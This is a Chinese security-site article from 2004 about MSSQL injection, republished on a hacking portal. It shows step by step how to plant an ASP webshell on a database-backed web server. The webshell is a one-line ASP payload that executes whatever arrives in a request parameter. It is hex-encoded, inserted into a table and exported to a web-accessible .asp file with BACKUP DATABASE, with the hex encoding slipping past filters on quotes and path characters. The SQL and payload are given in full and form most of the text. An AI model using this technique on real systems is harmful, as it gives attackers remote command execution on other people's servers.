首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Mssql Backup a Shell 突破特殊字符
来源:www.bugkidz.org 作者:SuperHei 发布时间:2004-10-12  

Mssql Backup a Shell 突破特殊字符
本文作者:SuperHei
安全天使:http://www.4ngel.net
BST:http://www.bugkidz.org

1.插入数据

mssql注射使用Backup或makewebtask得到webshell,在写入webshell代码时,如果过滤了一些特殊字符,如" '等。我们先mssql分析器里“查询”:

use pubs; <===使用数据哭pubs
create table cmd (str image); <===建立个表cmd 一个属性为image的列
insert into cmd (str) values ('<%execute request("cmd")&""%>') <===插入数据为 <%execute request("cmd")&""%>
select * from cmd; <===查询输出cmd里的所有数据

查询输出str为:
0x3C256578656375746520726571756573742822636D642229262222253E

我们不管插入str什么数据,在数据库里会自动转为hex编码,那么我们可以直接在上面的sql语句里insert into 的数据改为hex编码:

use pubs
create table cmd (str image)
insert into cmd(str) values(0x3C256578656375746520726571756573742822636D642229262222253E)
select * from cmd

查询输出str为:
0x3C256578656375746520726571756573742822636D642229262222253E

什么2种方法得到的结果一样,但是第2种方法里插入的数据,就没有' " &等等。

2.导出路径

常规的插入数据后导出webshell的语句为:

backup database model to disk='g:\wwwtest\l.asp';

显然导出路径里包涵了' : \等,我们照样可以使用hex编码来突破:

declare @a sysname
select @a=0x673A5C777777746573745C6C2E617370 <====0x673A5C777777746573745C6C2E617370为g:\wwwtest\l.asp对应的hex代码
backup database pubs to disk=@a

运行查询,可以成功导出webshell。

3.小结:

结合1,2我们可以得到完整的导出webshell的sql语句格式为:

use model
create table cmd (str image)
insert into cmd(str) values(0x***********)
declare @a sysname select @a=0x********** backup database pubs to disk=@a;

其实使用hex等编码的方法,在angel的文章〈饶过'(单引号)限制继续射入〉里提过,我只是照搬而已,你也可以搬到其他地方去拉:).

4.查考文章:

《饶过'(单引号)限制继续射入》http://www.4ngel.net/article/14.htm
《在MSSQL下实现Backup a shell》http://safer.cnwill.com/show.php?id=469
转hex脚本(aschex.pl) http://www.4ngel.net/project/aschex.txt



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·WDB论坛存在多个严重漏洞
·SYMANTEC防火墙内核溢出漏洞利用
·Linux内核漏洞浅析
·将连接数据库的代码隐藏在DLL中
·How to execute system command
·一次对ASP+ORACLE的注入手记
·小议溢出shell下的文件传送
·万网的尴尬-万网ORACLE注入漏洞
·Sql注射总结(强烈推荐)
·剑走偏锋——灵巧的旁注攻击
·渗透国内某网络游戏服务器群记实
·Discuz 2.2F注册程序过滤不严漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved